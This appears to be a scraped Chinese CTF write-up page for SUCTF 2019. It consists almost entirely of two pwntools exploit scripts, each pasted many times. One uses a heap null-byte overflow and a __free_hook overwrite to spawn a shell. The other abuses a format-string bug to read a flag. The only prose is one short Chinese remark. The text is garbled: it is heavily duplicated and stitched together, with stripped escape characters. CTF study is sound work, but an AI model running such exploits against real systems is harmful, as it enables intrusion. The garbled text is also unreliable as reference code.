'./glibc-all-in-one/libs/2.23-0ubuntu10_i386/'     ctx.remote_libc = './'     ctx.debug_remote_libc = True       def perchase(name_len, name, price):         sla('>>>', 1)         sla('length', name_len)         sa('Name', name)         sla('Price', price)      def comment(idx, comment, score):         sla('>>>', 2)         sla('Index', idx)         sa('Comment', comment)         sla('score', score)      def throw(idx):         sla('>>>', 3)         sla('index', idx)      def rename(idx, new_name, some_fuck):         sla('>>>', 4)         sla('index', idx)         sleep(0.1)         s(new_name)         sa('power', 'yn')         sla('serial', 'e4SyD1C!')         sa('Pwner', some_fuck)      ctx.breakpoints = [0x12f2, 0x1328, 0x118f]     rs('remote')     # rs()     libc = ELF('./')     # dbg('c')      perchase(0x10, 'testn', 0) #0     comment(0, 'testcommentn', 0)     perchase(0x10, 'testn', 0) #1     throw(0)      perchase(0x10, 'testn', 0) #0     comment(0, 'a', 0)     throw(0)      ru('Comment ')     libc_leak = uu32(r(4)) & 0xffffff00      success('libc_leak = {:#x}'.format(libc_leak))     libc_base = libc_leak - 0x1b0700      # clean up     throw(1)      #     perchase(0x8c, 'an', 0) #0     perchase(0x80, 'an', 0) #1     perchase(0x40, 'an', 0) #2     perchase(0xf8, 'an', 0) #3     perchase(0x20, 'topn', 0) #4      throw(2)     # null overflow     perchase(0x44, 'a'*0x40 + p32(0x190) + 'n', 0) #2     throw(0)     # overlap     throw(3)      perchase(0x10, 'an', 0) #0     perchase(0x50, 'an', 0)      perchase(0x100, p32(0) + p32(0x31) + p32(0) + p32(0x239) + ''*0x14 + 'n', 0)       throw(0)     perchase(0x100, '/bin/shn', 0)     libc.address = libc_base     free_hook = libc.sym['__free_hook']     system = libc.sym['system']     rename(1, p32(0)*5 + p32(free_hook), p32(system))     irt() 





# from PwnContext import *  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     #context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './pwn'     ctx.remote = ('', 10001)     #ctx.custom_lib_dir = './glibc-all-in-one/libs/2.23-0ubuntu10_i386/'     ctx.remote_libc = './'     ctx.debug_remote_libc = True       def perchase(name_len, name, price):         sla('>>>', 1)         sla('length', name_len)         sa('Name', name)         sla('Price', price)      def comment(idx, comment, score):         sla('>>>', 2)         sla('Index', idx)         sa('Comment', comment)         sla('score', score)      def throw(idx):         sla('>>>', 3)         sla('index', idx)      def rename(idx, new_name, some_fuck):         sla('>>>', 4)         sla('index', idx)         sleep(0.1)         s(new_name)         sa('power', 'yn')         sla('serial', 'e4SyD1C!')         sa('Pwner', some_fuck)      ctx.breakpoints = [0x12f2, 0x1328, 0x118f]     rs('remote')     # rs()     libc = ELF('./')     # dbg('c')      perchase(0x10, 'testn', 0) #0     comment(0, 'testcommentn', 0)     perchase(0x10, 'testn', 0) #1     throw(0)      perchase(0x10, 'testn', 0) #0     comment(0, 'a', 0)     throw(0)      ru('Comment ')     libc_leak = uu32(r(4)) & 0xffffff00      success('libc_leak = {:#x}'.format(libc_leak))     libc_base = libc_leak - 0x1b0700      # clean up     throw(1)      #     perchase(0x8c, 'an', 0) #0     perchase(0x80, 'an', 0) #1     perchase(0x40, 'an', 0) #2     perchase(0xf8, 'an', 0) #3     perchase(0x20, 'topn', 0) #4      throw(2)     # null overflow     perchase(0x44, 'a'*0x40 + p32(0x190) + 'n', 0) #2     throw(0)     # overlap     throw(3)      perchase(0x10, 'an', 0) #0     perchase(0x50, 'an', 0)      perchase(0x100, p32(0) + p32(0x31) + p32(0) + p32(0x239) + ''*0x14 + 'n', 0)       throw(0)     perchase(0x100, '/bin/shn', 0)     libc.address = libc_base     free_hook = libc.sym['__free_hook']     system = libc.sym['system']     rename(1, p32(0)*5 + p32(free_hook), p32(system))     irt() 


虽然仅仅是差了一步保存状态,但是自己确实一直以来从未考虑过这个问题,认为只有实战中才要考虑 ,CTF就是瞎鸡儿日就ok了。看似一步之差,差的缺很多很多。尤其是看完wp。



# from PwnContext import *  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     #context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './pwn'     ctx.remote = ('', 10001)     #ctx.custom_lib_dir = './glibc-all-in-one/libs/2.23-0ubuntu10_i386/'     ctx.remote_libc = './'     ctx.debug_remote_libc = True       def perchase(name_len, name, price):         sla('>>>', 1)         sla('length', name_len)         sa('Name', name)         sla('Price', price)      def comment(idx, comment, score):         sla('>>>', 2)         sla('Index', idx)         sa('Comment', comment)         sla('score', score)      def throw(idx):         sla('>>>', 3)         sla('index', idx)      def rename(idx, new_name, some_fuck):         sla('>>>', 4)         sla('index', idx)         sleep(0.1)         s(new_name)         sa('power', 'yn')         sla('serial', 'e4SyD1C!')         sa('Pwner', some_fuck)      ctx.breakpoints = [0x12f2, 0x1328, 0x118f]     rs('remote')     # rs()     libc = ELF('./')     # dbg('c')      perchase(0x10, 'testn', 0) #0     comment(0, 'testcommentn', 0)     perchase(0x10, 'testn', 0) #1     throw(0)      perchase(0x10, 'testn', 0) #0     comment(0, 'a', 0)     throw(0)      ru('Comment ')     libc_leak = uu32(r(4)) & 0xffffff00      success('libc_leak = {:#x}'.format(libc_leak))     libc_base = libc_leak - 0x1b0700      # clean up     throw(1)      #     perchase(0x8c, 'an', 0) #0     perchase(0x80, 'an', 0) #1     perchase(0x40, 'an', 0) #2     perchase(0xf8, 'an', 0) #3     perchase(0x20, 'topn', 0) #4      throw(2)     # null overflow     perchase(0x44, 'a'*0x40 + p32(0x190) + 'n', 0) #2     throw(0)     # overlap     throw(3)      perchase(0x10, 'an', 0) #0     perchase(0x50, 'an', 0)      perchase(0x100, p32(0) + p32(0x31) + p32(0) + p32(0x239) + ''*0x14 + 'n', 0)       throw(0)     perchase(0x100, '/bin/shn', 0)     libc.address = libc_base     free_hook = libc.sym['__free_hook']     system = libc.sym['system']     rename(1, p32(0)*5 + p32(free_hook), p32(system))     irt() 








kn0ck suctf19 writeup - 安全客,安全资讯平台



# from PwnContext import *  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     #context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './pwn'     ctx.remote = ('', 10001)     #ctx.custom_lib_dir = './glibc-all-in-one/libs/2.23-0ubuntu10_i386/'     ctx.remote_libc = './'     ctx.debug_remote_libc = True       def perchase(name_len, name, price):         sla('>>>', 1)         sla('length', name_len)         sa('Name', name)         sla('Price', price)      def comment(idx, comment, score):         sla('>>>', 2)         sla('Index', idx)         sa('Comment', comment)         sla('score', score)      def throw(idx):         sla('>>>', 3)         sla('index', idx)      def rename(idx, new_name, some_fuck):         sla('>>>', 4)         sla('index', idx)         sleep(0.1)         s(new_name)         sa('power', 'yn')         sla('serial', 'e4SyD1C!')         sa('Pwner', some_fuck)      ctx.breakpoints = [0x12f2, 0x1328, 0x118f]     rs('remote')     # rs()     libc = ELF('./')     # dbg('c')      perchase(0x10, 'testn', 0) #0     comment(0, 'testcommentn', 0)     perchase(0x10, 'testn', 0) #1     throw(0)      perchase(0x10, 'testn', 0) #0     comment(0, 'a', 0)     throw(0)      ru('Comment ')     libc_leak = uu32(r(4)) & 0xffffff00      success('libc_leak = {:#x}'.format(libc_leak))     libc_base = libc_leak - 0x1b0700      # clean up     throw(1)      #     perchase(0x8c, 'an', 0) #0     perchase(0x80, 'an', 0) #1     perchase(0x40, 'an', 0) #2     perchase(0xf8, 'an', 0) #3     perchase(0x20, 'topn', 0) #4      throw(2)     # null overflow     perchase(0x44, 'a'*0x40 + p32(0x190) + 'n', 0) #2     throw(0)     # overlap     throw(3)      perchase(0x10, 'an', 0) #0     perchase(0x50, 'an', 0)      perchase(0x100, p32(0) + p32(0x31) + p32(0) + p32(0x239) + ''*0x14 + 'n', 0)       throw(0)     perchase(0x100, '/bin/shn', 0)     libc.address = libc_base     free_hook = libc.sym['__free_hook']     system = libc.sym['system']     rename(1, p32(0)*5 + p32(free_hook), p32(system))     irt() 


Akira HomeWork




# from PwnContext import *  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     #context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './pwn'     ctx.remote = ('', 10001)     #ctx.custom_lib_dir = './glibc-all-in-one/libs/2.23-0ubuntu10_i386/'     ctx.remote_libc = './'     ctx.debug_remote_libc = True       def perchase(name_len, name, price):         sla('>>>', 1)         sla('length', name_len)         sa('Name', name)         sla('Price', price)      def comment(idx, comment, score):         sla('>>>', 2)         sla('Index', idx)         sa('Comment', comment)         sla('score', score)      def throw(idx):         sla('>>>', 3)         sla('index', idx)      def rename(idx, new_name, some_fuck):         sla('>>>', 4)         sla('index', idx)         sleep(0.1)         s(new_name)         sa('power', 'yn')         sla('serial', 'e4SyD1C!')         sa('Pwner', some_fuck)      ctx.breakpoints = [0x12f2, 0x1328, 0x118f]     rs('remote')     # rs()     libc = ELF('./')     # dbg('c')      perchase(0x10, 'testn', 0) #0     comment(0, 'testcommentn', 0)     perchase(0x10, 'testn', 0) #1     throw(0)      perchase(0x10, 'testn', 0) #0     comment(0, 'a', 0)     throw(0)      ru('Comment ')     libc_leak = uu32(r(4)) & 0xffffff00      success('libc_leak = {:#x}'.format(libc_leak))     libc_base = libc_leak - 0x1b0700      # clean up     throw(1)      #     perchase(0x8c, 'an', 0) #0     perchase(0x80, 'an', 0) #1     perchase(0x40, 'an', 0) #2     perchase(0xf8, 'an', 0) #3     perchase(0x20, 'topn', 0) #4      throw(2)     # null overflow     perchase(0x44, 'a'*0x40 + p32(0x190) + 'n', 0) #2     throw(0)     # overlap     throw(3)      perchase(0x10, 'an', 0) #0     perchase(0x50, 'an', 0)      perchase(0x100, p32(0) + p32(0x31) + p32(0) + p32(0x239) + ''*0x14 + 'n', 0)       throw(0)     perchase(0x100, '/bin/shn', 0)     libc.address = libc_base     free_hook = libc.sym['__free_hook']     system = libc.sym['system']     rename(1, p32(0)*5 + p32(free_hook), p32(system))     irt() 




# from PwnContext import *  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     #context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './pwn'     ctx.remote = ('', 10001)     #ctx.custom_lib_dir = './glibc-all-in-one/libs/2.23-0ubuntu10_i386/'     ctx.remote_libc = './'     ctx.debug_remote_libc = True       def perchase(name_len, name, price):         sla('>>>', 1)         sla('length', name_len)         sa('Name', name)         sla('Price', price)      def comment(idx, comment, score):         sla('>>>', 2)         sla('Index', idx)         sa('Comment', comment)         sla('score', score)      def throw(idx):         sla('>>>', 3)         sla('index', idx)      def rename(idx, new_name, some_fuck):         sla('>>>', 4)         sla('index', idx)         sleep(0.1)         s(new_name)         sa('power', 'yn')         sla('serial', 'e4SyD1C!')         sa('Pwner', some_fuck)      ctx.breakpoints = [0x12f2, 0x1328, 0x118f]     rs('remote')     # rs()     libc = ELF('./')     # dbg('c')      perchase(0x10, 'testn', 0) #0     comment(0, 'testcommentn', 0)     perchase(0x10, 'testn', 0) #1     throw(0)      perchase(0x10, 'testn', 0) #0     comment(0, 'a', 0)     throw(0)      ru('Comment ')     libc_leak = uu32(r(4)) & 0xffffff00      success('libc_leak = {:#x}'.format(libc_leak))     libc_base = libc_leak - 0x1b0700      # clean up     throw(1)      #     perchase(0x8c, 'an', 0) #0     perchase(0x80, 'an', 0) #1     perchase(0x40, 'an', 0) #2     perchase(0xf8, 'an', 0) #3     perchase(0x20, 'topn', 0) #4      throw(2)     # null overflow     perchase(0x44, 'a'*0x40 + p32(0x190) + 'n', 0) #2     throw(0)     # overlap     throw(3)      perchase(0x10, 'an', 0) #0     perchase(0x50, 'an', 0)      perchase(0x100, p32(0) + p32(0x31) + p32(0) + p32(0x239) + ''*0x14 + 'n', 0)       throw(0)     perchase(0x100, '/bin/shn', 0)     libc.address = libc_base     free_hook = libc.sym['__free_hook']     system = libc.sym['system']     rename(1, p32(0)*5 + p32(free_hook), p32(system))     irt() 





kn0ck suctf19 writeup - 安全客,安全资讯平台


kn0ck suctf19 writeup - 安全客,安全资讯平台


# from PwnContext import *  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     #context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './pwn'     ctx.remote = ('', 10001)     #ctx.custom_lib_dir = './glibc-all-in-one/libs/2.23-0ubuntu10_i386/'     ctx.remote_libc = './'     ctx.debug_remote_libc = True       def perchase(name_len, name, price):         sla('>>>', 1)         sla('length', name_len)         sa('Name', name)         sla('Price', price)      def comment(idx, comment, score):         sla('>>>', 2)         sla('Index', idx)         sa('Comment', comment)         sla('score', score)      def throw(idx):         sla('>>>', 3)         sla('index', idx)      def rename(idx, new_name, some_fuck):         sla('>>>', 4)         sla('index', idx)         sleep(0.1)         s(new_name)         sa('power', 'yn')         sla('serial', 'e4SyD1C!')         sa('Pwner', some_fuck)      ctx.breakpoints = [0x12f2, 0x1328, 0x118f]     rs('remote')     # rs()     libc = ELF('./')     # dbg('c')      perchase(0x10, 'testn', 0) #0     comment(0, 'testcommentn', 0)     perchase(0x10, 'testn', 0) #1     throw(0)      perchase(0x10, 'testn', 0) #0     comment(0, 'a', 0)     throw(0)      ru('Comment ')     libc_leak = uu32(r(4)) & 0xffffff00      success('libc_leak = {:#x}'.format(libc_leak))     libc_base = libc_leak - 0x1b0700      # clean up     throw(1)      #     perchase(0x8c, 'an', 0) #0     perchase(0x80, 'an', 0) #1     perchase(0x40, 'an', 0) #2     perchase(0xf8, 'an', 0) #3     perchase(0x20, 'topn', 0) #4      throw(2)     # null overflow     perchase(0x44, 'a'*0x40 + p32(0x190) + 'n', 0) #2     throw(0)     # overlap     throw(3)      perchase(0x10, 'an', 0) #0     perchase(0x50, 'an', 0)      perchase(0x100, p32(0) + p32(0x31) + p32(0) + p32(0x239) + ''*0x14 + 'n', 0)       throw(0)     perchase(0x100, '/bin/shn', 0)     libc.address = libc_base     free_hook = libc.sym['__free_hook']     system = libc.sym['system']     rename(1, p32(0)*5 + p32(free_hook), p32(system))     irt() 



kn0ck suctf19 writeup - 安全客,安全资讯平台



kn0ck suctf19 writeup - 安全客,安全资讯平台


# from PwnContext import *  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     #context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './pwn'     ctx.remote = ('', 10001)     #ctx.custom_lib_dir = './glibc-all-in-one/libs/2.23-0ubuntu10_i386/'     ctx.remote_libc = './'     ctx.debug_remote_libc = True       def perchase(name_len, name, price):         sla('>>>', 1)         sla('length', name_len)         sa('Name', name)         sla('Price', price)      def comment(idx, comment, score):         sla('>>>', 2)         sla('Index', idx)         sa('Comment', comment)         sla('score', score)      def throw(idx):         sla('>>>', 3)         sla('index', idx)      def rename(idx, new_name, some_fuck):         sla('>>>', 4)         sla('index', idx)         sleep(0.1)         s(new_name)         sa('power', 'yn')         sla('serial', 'e4SyD1C!')         sa('Pwner', some_fuck)      ctx.breakpoints = [0x12f2, 0x1328, 0x118f]     rs('remote')     # rs()     libc = ELF('./')     # dbg('c')      perchase(0x10, 'testn', 0) #0     comment(0, 'testcommentn', 0)     perchase(0x10, 'testn', 0) #1     throw(0)      perchase(0x10, 'testn', 0) #0     comment(0, 'a', 0)     throw(0)      ru('Comment ')     libc_leak = uu32(r(4)) & 0xffffff00      success('libc_leak = {:#x}'.format(libc_leak))     libc_base = libc_leak - 0x1b0700      # clean up     throw(1)      #     perchase(0x8c, 'an', 0) #0     perchase(0x80, 'an', 0) #1     perchase(0x40, 'an', 0) #2     perchase(0xf8, 'an', 0) #3     perchase(0x20, 'topn', 0) #4      throw(2)     # null overflow     perchase(0x44, 'a'*0x40 + p32(0x190) + 'n', 0) #2     throw(0)     # overlap     throw(3)      perchase(0x10, 'an', 0) #0     perchase(0x50, 'an', 0)      perchase(0x100, p32(0) + p32(0x31) + p32(0) + p32(0x239) + ''*0x14 + 'n', 0)       throw(0)     perchase(0x100, '/bin/shn', 0)     libc.address = libc_base     free_hook = libc.sym['__free_hook']     system = libc.sym['system']     rename(1, p32(0)*5 + p32(free_hook), p32(system))     irt() 





kn0ck suctf19 writeup - 安全客,安全资讯平台


kn0ck suctf19 writeup - 安全客,安全资讯平台


kn0ck suctf19 writeup - 安全客,安全资讯平台


# from PwnContext import *  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     #context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './pwn'     ctx.remote = ('', 10001)     #ctx.custom_lib_dir = './glibc-all-in-one/libs/2.23-0ubuntu10_i386/'     ctx.remote_libc = './'     ctx.debug_remote_libc = True       def perchase(name_len, name, price):         sla('>>>', 1)         sla('length', name_len)         sa('Name', name)         sla('Price', price)      def comment(idx, comment, score):         sla('>>>', 2)         sla('Index', idx)         sa('Comment', comment)         sla('score', score)      def throw(idx):         sla('>>>', 3)         sla('index', idx)      def rename(idx, new_name, some_fuck):         sla('>>>', 4)         sla('index', idx)         sleep(0.1)         s(new_name)         sa('power', 'yn')         sla('serial', 'e4SyD1C!')         sa('Pwner', some_fuck)      ctx.breakpoints = [0x12f2, 0x1328, 0x118f]     rs('remote')     # rs()     libc = ELF('./')     # dbg('c')      perchase(0x10, 'testn', 0) #0     comment(0, 'testcommentn', 0)     perchase(0x10, 'testn', 0) #1     throw(0)      perchase(0x10, 'testn', 0) #0     comment(0, 'a', 0)     throw(0)      ru('Comment ')     libc_leak = uu32(r(4)) & 0xffffff00      success('libc_leak = {:#x}'.format(libc_leak))     libc_base = libc_leak - 0x1b0700      # clean up     throw(1)      #     perchase(0x8c, 'an', 0) #0     perchase(0x80, 'an', 0) #1     perchase(0x40, 'an', 0) #2     perchase(0xf8, 'an', 0) #3     perchase(0x20, 'topn', 0) #4      throw(2)     # null overflow     perchase(0x44, 'a'*0x40 + p32(0x190) + 'n', 0) #2     throw(0)     # overlap     throw(3)      perchase(0x10, 'an', 0) #0     perchase(0x50, 'an', 0)      perchase(0x100, p32(0) + p32(0x31) + p32(0) + p32(0x239) + ''*0x14 + 'n', 0)       throw(0)     perchase(0x100, '/bin/shn', 0)     libc.address = libc_base     free_hook = libc.sym['__free_hook']     system = libc.sym['system']     rename(1, p32(0)*5 + p32(free_hook), p32(system))     irt() 



# from PwnContext import *  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     #context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './pwn'     ctx.remote = ('', 10001)     #ctx.custom_lib_dir = './glibc-all-in-one/libs/2.23-0ubuntu10_i386/'     ctx.remote_libc = './'     ctx.debug_remote_libc = True       def perchase(name_len, name, price):         sla('>>>', 1)         sla('length', name_len)         sa('Name', name)         sla('Price', price)      def comment(idx, comment, score):         sla('>>>', 2)         sla('Index', idx)         sa('Comment', comment)         sla('score', score)      def throw(idx):         sla('>>>', 3)         sla('index', idx)      def rename(idx, new_name, some_fuck):         sla('>>>', 4)         sla('index', idx)         sleep(0.1)         s(new_name)         sa('power', 'yn')         sla('serial', 'e4SyD1C!')         sa('Pwner', some_fuck)      ctx.breakpoints = [0x12f2, 0x1328, 0x118f]     rs('remote')     # rs()     libc = ELF('./')     # dbg('c')      perchase(0x10, 'testn', 0) #0     comment(0, 'testcommentn', 0)     perchase(0x10, 'testn', 0) #1     throw(0)      perchase(0x10, 'testn', 0) #0     comment(0, 'a', 0)     throw(0)      ru('Comment ')     libc_leak = uu32(r(4)) & 0xffffff00      success('libc_leak = {:#x}'.format(libc_leak))     libc_base = libc_leak - 0x1b0700      # clean up     throw(1)      #     perchase(0x8c, 'an', 0) #0     perchase(0x80, 'an', 0) #1     perchase(0x40, 'an', 0) #2     perchase(0xf8, 'an', 0) #3     perchase(0x20, 'topn', 0) #4      throw(2)     # null overflow     perchase(0x44, 'a'*0x40 + p32(0x190) + 'n', 0) #2     throw(0)     # overlap     throw(3)      perchase(0x10, 'an', 0) #0     perchase(0x50, 'an', 0)      perchase(0x100, p32(0) + p32(0x31) + p32(0) + p32(0x239) + ''*0x14 + 'n', 0)       throw(0)     perchase(0x100, '/bin/shn', 0)     libc.address = libc_base     free_hook = libc.sym['__free_hook']     system = libc.sym['system']     rename(1, p32(0)*5 + p32(free_hook), p32(system))     irt() 




kn0ck suctf19 writeup - 安全客,安全资讯平台


# from PwnContext import *  try:     from IPython import embed as ipy except ImportError:     print ('IPython not installed.')  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './playfmt'     ctx.custom_lib_dir = '/root/share/project/glibc-all-in-one/libs/2.23-0ubuntu11_i386/'     ctx.debug_remote_libc = True     ctx.remote = ('', 9999)     def fmt(payload):         sleep(0.2)         s(payload)     rs('remote')      sleep(1)     ctx.clean()     fmt('%18$x')     heap_leak = int(r(), 16)     flag_addr = heap_leak - 0x18      flag_addr_c = p32(flag_addr)      for i in range(4):         fmt('%{}c%6$hhn'.format(i+0xf0))         fmt('%{}c%14$hhn'.format(ord(flag_addr_c[i])))     fmt('%240c%6$hhn')              dbg('b *0x0804889Fnc')      sleep(1)     ctx.clean()     fmt('%6$x')     stack = int(ru(8), 16)      addup = (0xf0 - (stack & 0xff))/4      fmt('%240c%6$hhn%{}$s'.format(addup+14))     r() 


kn0ck suctf19 writeup - 安全客,安全资讯平台


# from PwnContext import *  try:     from IPython import embed as ipy except ImportError:     print ('IPython not installed.')  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './playfmt'     ctx.custom_lib_dir = '/root/share/project/glibc-all-in-one/libs/2.23-0ubuntu11_i386/'     ctx.debug_remote_libc = True     ctx.remote = ('', 9999)     def fmt(payload):         sleep(0.2)         s(payload)     rs('remote')      sleep(1)     ctx.clean()     fmt('%18$x')     heap_leak = int(r(), 16)     flag_addr = heap_leak - 0x18      flag_addr_c = p32(flag_addr)      for i in range(4):         fmt('%{}c%6$hhn'.format(i+0xf0))         fmt('%{}c%14$hhn'.format(ord(flag_addr_c[i])))     fmt('%240c%6$hhn')              dbg('b *0x0804889Fnc')      sleep(1)     ctx.clean()     fmt('%6$x')     stack = int(ru(8), 16)      addup = (0xf0 - (stack & 0xff))/4      fmt('%240c%6$hhn%{}$s'.format(addup+14))     r() 


kn0ck suctf19 writeup - 安全客,安全资讯平台


